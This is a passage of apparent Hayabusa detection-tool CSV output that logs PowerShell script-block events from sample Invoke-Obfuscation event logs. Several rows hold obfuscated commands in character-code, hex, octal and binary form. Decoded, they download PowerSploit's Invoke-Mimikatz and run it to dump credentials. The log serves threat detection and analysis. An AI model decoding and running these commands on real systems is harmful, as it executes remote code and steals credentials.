$_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 19:12:09.081 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 19:12:09.119 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 19:12:09.152 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 19:12:09.159 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 19:12:09.176 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 19:12:09.189 
+00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 19:12:09.191 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 19:12:09.237 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 19:12:28.360 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"iNVOkE-expRessION (( [RUNTiMe.inTEROPsErVices.MARsHaL]::ptrTOsTRINgautO( [runTIME.IntErOPsERvIceS.MarSHAL]::SEcureSTRIngtObsTr($('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'|CoNverTTo-secuReStriNG -k 82,189,200,92,184,235,46,38,211,250,202,240,198,208,70,100,210,121,211,227,2,148,77,154,149,200,93,130,24,30,119,255) ) )) )",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 19:12:28.360 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"iNVOkE-expRessION (( [RUNTiMe.inTEROPsErVices.MARsHaL]::ptrTOsTRINgautO( [runTIME.IntErOPsERvIceS.MarSHAL]::SEcureSTRIngtObsTr($('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'|CoNverTTo-secuReStriNG -k 82,189,200,92,184,235,46,38,211,250,202,240,198,208,70,100,210,121,211,227,2,148,77,154,149,200,93,130,24,30,119,255) ) )) 
)",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 19:12:28.360 +00:00,SEC511,4104,high,Exec,Accessing WinAPI in PowerShell,,rules/sigma/powershell/powershell_script/posh_ps_accessing_win_api.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 19:13:38.198 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"& ( $eNv:COmSPEc[4,15,25]-JoIN'') ([ChAr[]] (73, 69 , 88 ,32 ,40,78 ,101 ,119 ,45, 79, 98,106 ,101,99 , 116 ,32 ,78,101, 116, 46,87, 101 ,98 , 67 ,108 ,105,101 ,110, 116 ,41 , 46, 68, 111 ,119 , 110 , 108 , 111 ,97 ,100 , 83,116, 114,105 , 110, 103, 40 , 39, 104, 116 , 116,112 , 115,58,47,47 ,114, 97 ,119,46 , 103,105 , 116, 104,117, 98 ,117 , 115 , 101 ,114,99, 111 ,110 , 116,101 ,110 , 116, 46 , 99 , 111,109 ,47 ,109 ,97,116 , 116,105,102, 101 , 115 , 116,97 , 116 ,105 ,111 , 110,47,80,111 ,119 , 101,114,83, 112, 108,111, 105,116 ,47,109, 97 , 115 , 116, 101 ,114,47 ,69 ,120, 102,105, 108,116 , 114, 97,116 , 105,111,110, 47 , 73,110 ,118 ,111 , 107 , 101,45 , 77, 105 ,109 , 105, 107 , 97 , 116, 122 , 46 ,112 ,115, 49, 39 ,41 , 59 , 32,73 , 110 , 118 ,111 ,107 ,101,45,77,105 , 109 ,105, 107 ,97, 116 ,122,32 ,45 , 68 ,117 ,109,112 , 67 ,114 , 101,100 , 115 )-join '')",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:13:52.552 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"[sTRInG]::jOiN('' , (( 49 ,45 , 58,20,28 , '4e',65,77 , '2d' ,'4f' ,62 , '6a' , 65,63, 74 ,20 ,'4e', 65 ,74 ,'2e' ,57, 65 , 62,43 ,'6c',69, 65 , '6e' , 74 ,29 ,'2e',44,'6f' , 77 ,'6e','6c' , '6f' ,61, 64 ,53 , 74,72 ,69 ,'6e',67, 28, 27 , 68 ,74, 74,70 ,73, '3a', '2f','2f', 72, 61, 77 , '2e',67,69, 74 ,68 , 75,62, 75, 73,65 ,72,63, '6f','6e',74 ,65, '6e', 74 ,'2e',63 ,'6f', '6d','2f' , 
'6d', 61 ,74 ,74, 69,66 , 65, 73 ,74 ,61, 74 , 69 ,'6f' , '6e', '2f' ,50,'6f',77, 65,72,53 ,70, '6c' , '6f' ,69 ,74, '2f' , '6d' , 61 , 73 , 74,65,72 , '2f' ,45,78,66, 69, '6c', 74 , 72,61, 74,69,'6f' , '6e' , '2f' , 49,'6e' , 76, '6f','6b' ,65 , '2d' , '4d' ,69,'6d' , 69, '6b',61 , 74 , '7a' , '2e',70, 73 , 31 , 27, 29 ,'3b' ,20 ,49 ,'6e' , 76,'6f', '6b', 65, '2d', '4d',69, '6d' ,69,'6b' , 61 ,74, '7a' , 20 , '2d' ,44 , 75,'6d' , 70, 43, 72 ,65 ,64 , 73)|FoReaCh{ ([ChaR] ([Convert]::TOiNt16(($_.tOsTriNg()),16 )))}))|&( $enV:PuBlic[13]+$eNv:PUbliC[5]+'X')",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:13:52.553 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"{ ([ChaR] ([Convert]::TOiNt16(($_.tOsTriNg()),16 )))}",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:14:24.419 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:14:24.432 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"{$DelimitedEncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + (Get-Random -Input $RandomDelimiters))}",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:14:24.518 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} 
$Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:14:24.526 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:14:24.531 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:14:24.534 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:14:24.537 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:14:24.539 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:14:24.543 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char 
= $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:14:24.553 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:14:24.590 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:14:24.603 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"{$EncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)))}",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:14:24.765 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:14:24.772 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} 
$Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:14:24.809 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:14:33.323 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"& ( $ENV:pUbLIc[13]+$EnV:pubLIc[5]+'X') ([STrIng]::JOin('' , ((111 ,105, 130 , 40,50,116 ,145 , 167, 55,117,142 , 152 ,145,143 ,164 , 40, 116,145,164,56, 127, 145 ,142, 103 ,154, 151 ,145 ,156 , 164,51, 56 , 104 ,157, 167 ,156 , 154 , 157 , 141 , 144, 123 ,164,162 ,151, 156,147, 50 ,47 ,150 , 164,164,160 , 163 , 72,57, 57,162, 141,167 , 56,147 ,151, 164,150, 165, 142 ,165 , 163, 145, 162,143 ,157, 156 ,164 ,145,156 , 164,56 ,143 ,157 ,155,57, 155 ,141, 164 , 164, 151 , 146,145 ,163, 164 , 141, 164 ,151, 157, 156 ,57 , 120 ,157,167 , 145,162 , 123,160 , 154, 157, 151, 164, 57,155 , 141, 163 ,164,145,162,57,105, 170 , 146,151, 154, 164 , 162 , 141,164,151,157,156 , 57,111,156 , 166 , 157, 153, 145,55, 115 ,151, 155 ,151, 153,141, 164 ,172,56, 160 , 163, 61 ,47 ,51,73 , 40,111,156 , 166, 157 ,153 , 145 ,55 ,115, 151 , 155 ,151 ,153 , 141, 164 ,172 ,40,55, 104,165 , 155, 160 ,103, 162 , 145 , 144 , 163 )| FOrEacH { ([cHar] ([coNVErT]::TOiNT16( ([String]$_ ),8) )) } )))",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:14:33.323 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"{ ([cHar] ([coNVErT]::TOiNT16( ([String]$_ ),8) )) 
}",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:14:51.663 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,".( $vErBOSePreFErencE.TOSTRING()[1,3]+'X'-joIN'')(( '1001001}1000101r1011000C100000&101000&1001110C1100101r1110111C101101;1001111v1100010;1101010r1100101v1100011j1110100v100000X1001110o1100101}1110100X101110}1010111;1100101r1100010v1000011X1101100v1101001j1100101v1101110j1110100}101001j101110}1000100j1101111g1110111g1101110}1101100g1101111g1100001;1100100;1010011}1110100;1110010g1101001X1101110&1100111X101000v100111}1101000;1110100r1110100j1110000}1110011v111010j101111r101111}1110010o1100001X1110111r101110r1100111X1101001&1110100o1101000g1110101j1100010C1110101}1110011&1100101X1110010}1100011}1101111j1101110v1110100j1100101C1101110;1110100r101110&1100011r1101111;1101101&101111&1101101X1100001}1110100}1110100;1101001o1100110v1100101;1110011C1110100C1100001j1110100r1101001;1101111o1101110o101111j1010000&1101111X1110111}1100101j1110010j1010011&1110000;1101100r1101111r1101001;1110100o101111&1101101v1100001r1110011;1110100g1100101j1110010j101111r1000101v1111000r1100110j1101001X1101100C1110100r1110010;1100001o1110100C1101001;1101111X1101110j101111C1001001X1101110;1110110}1101111r1101011&1100101j101101&1001101r1101001v1101101;1101001o1101011o1100001&1110100o1111010v101110g1110000r1110011}110001g100111o101001v111011j100000;1001001j1101110r1110110X1101111v1101011}1100101v101101;1001101r1101001&1101101;1101001C1101011v1100001&1110100j1111010}100000}101101}1000100C1110101v1101101r1110000v1000011j1110010r1100101v1100100;1110011' -splIT 'o'-splIt '&' -SPlIT 'r' -SplIt 'v' -sPLIT 'g'-SPliT';'-spLIT'X'-sPlIt'}' -sPLIT 'C'-SPLIT'j'|FOReaCH-ObjEct {([CHaR]([ConvERT]::tOINT16(( [sTRinG]$_),2 ) )) })-JOIN '' 
)",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:14:51.666 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"{([CHaR]([ConvERT]::tOINT16(( [sTRinG]$_),2 ) )) }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:15:23.660 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"( [rUntImE.iNtEROPSeRviCEs.mARShaL]::pTRtOSTriNGBstR([ruNtIMe.iNTeropSERVIcES.MarsHAl]::seCUResTRingtObstr($('76492d1116743f0423413b16050a5345MgB8ADcAUABxAFcAagBnAHgAUQBpAGoARABCADkARABNAHgAVQAxAEgAUQA1AGcAPQA9AHwANABjADQANgBmADUANgA3ADgAYgBhADkANwBmADUANwA3ADgAOABlADkANgAxAGMAMgA0ADAAMQA0ADkAZQA3AGEAYQAwADUANQAxADAANQBiADcAMQA3ADUANQA4AGEAYwAyAGMANQA3ADkAYgBiADkAMQBhAGIANgAzAGUAYwAxAGEAOAAwAGMAZABkADUAMgA4ADcAZAA1AGUAMwA4AGEANAA3AGUANQA5ADUANwBjAGMANwA5ADcAMwBhADIANAA2ADMAMQBmAGMAYwA1ADgAYQA5ADQAOAAwADgAOQAyADQAYwA2ADUAYwAyADkANgBhAGUAYwA0ADAAZAA2AGQANQA0ADkAYgA3ADgAYQA1ADcANAA5ADYAYwAyADgAZQA5AGIANgBlADQAZgBlADgAYQBlADcAYQA1ADgAYQAxADYAYgA3AGUAZABiAGEAMgAyAGMAZAA3AGEAMAA4AGYAYwAyAGMAMQAxADUANAAzADUAOAA1ADIAMQA4AGMANQA1AGEANAA4ADgAZgA0AGQAZgBhADYAYwBhAGIAOAA1AGUANgBlADMAMQBiAGMAYwA4AGEANAAxADMANgAxADEAYwBlADgAZQBjAGUAMwBkADEAYgA1AGQAMgBiADYANQA5AGUANgA5AGMAZAA1AGIANgBkADMAYwA4ADYANwAwADkAMwA4AGUAOABiADIANgA3AGIAZABkADEAYQA4ADMAOQBkAGQAOQAxADkANwA5ADkAYQA4ADYAZQBlADIANQBkADYAMQA5ADEAMQA0ADUANwA3ADkAMgA3AGUAMwBkADEANQBlADgAZABlADcAZgAyADQAYgBhADAAYwA4ADgANABjADkAYgBiADUANQAxADQAOQBjADkAMgBhAGYAOQAwAGUAOQA4ADUANgA2ADcAZAA5ADQANAAzAGQANABiADIAOABlAGUANAA0AGIANAAxADEAOABlAGMAMQBlADIANgA0AGIAMQA2AGYAMwBlAGUAYQA1ADkAOABmADgAMAA4ADEAZgAyADIAZQBmADQAMABlADgAMAAxADcAZABiAGEAOQAyAGIAYgBhAGUAMAA0ADIAZQA2ADcAZQA3ADQAMQA0ADYAMgA0ADQAZQBmADEAOQBlADkAYwAxAGEANwBjAGMAOQBjAGYAZgAyAGMAYgA0AGEAMAA3ADMANABkAGQAMwA0AGUAOAA4AGUANQAwA
DEAYgA2ADkAZgAyADgAYQA1AGQAOQA4AGQAMQAxADgAOAA4AGMAZQAwAGEAZQBmADMAZQAyAGYAMgA1ADgAZgA4ADcAMwA1ADkANQA4AGUAYwBjADQANwBiADcAYgA1ADAAYQA5AGMAZgAyADMAZAA3ADQANgA1ADEAZgAxAGQANAA5ADEAYQAwADcAYgBhAGMAMwA3ADcAYgBmADgAMwA2ADYAYQBjAGUAZAA4ADIAZABmAGEAMwA0AGQAYwBjADkAZABlADYAYgAyADkAMABlAGUAYgAwADAAMgBjADIANgAwADMAMQA3AGMAMQBlADIAMQBlADQANAA1AGUAOAAzADgAYQBkAGMANAA0AGYAMwBlADgAYgA5ADMAMwBlAGIANgAwAGEANgAyADAAZABlADkANgAxADMANgA4ADgAMAA4ADUAMgBiADEAYgAzAGYAMQAxADkAZgAyADMAMQAzADkAMAA0ADkANQBlADMAOAA3AGYAMQA5AGUAZQAxADEAZgBlADMANQBjADEANAA2AGEAYQA3AGIANABiAGUAMQAwADUAMABhADQAZgAzAGQAZgBmADkAZQBmADYAYQBhADUAYwBmAGUANABhAGUAOABkAGYAMAA4AGYAMgA5AGQANAA2AGUANQA4ADcANgAzADgAYwBlADcAYwBkADEANwBhADAAMwAwAGEANQAxAGMAOQA1ADIAZgBmAGYANgA2ADYAZgA0ADAAOQA='|CONveRTTO-secUResTRING -KEy 196,47,72,214,193,53,146,52,139,252,69,219,170,135,151,62,90,5,213,36,116,154,71,183) ) ))| .( $VErBosePRefERencE.toStrING()[1,3]+'x'-JOiN'')",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:15:23.660 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"( [rUntImE.iNtEROPSeRviCEs.mARShaL]::pTRtOSTriNGBstR([ruNtIMe.iNTeropSERVIcES.MarsHAl]::seCUResTRingtObstr($('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'|CONveRTTO-secUResTRING -KEy 196,47,72,214,193,53,146,52,139,252,69,219,170,135,151,62,90,5,213,36,116,154,71,183) ) ))| .( $VErBosePRefERencE.toStrING()[1,3]+'x'-JOiN'')",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:15:23.660 +00:00,SEC511,4104,high,Exec,Accessing WinAPI in PowerShell,,rules/sigma/powershell/powershell_script/posh_ps_accessing_win_api.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:15:39.455 +00:00,SEC511,4104,info,,PwSh 
Scriptblock Log,{$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:15:39.469 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$DelimitedEncodedArray += ([String]([Int][Char]$_ -BXOR $BXORValue) + (Get-Random -Input $RandomDelimiters))},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:15:39.555 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:15:39.563 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:15:39.568 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:15:39.571 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} 
$Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:15:39.574 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:15:39.577 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:15:39.580 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:15:39.581 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:15:39.585 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:15:39.588 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char 
= $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:15:39.901 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"{$EncodedArray += ([String]([Int][Char]$_ -BXOR $BXORValue)) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1))}",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:15:40.071 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:15:40.085 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) 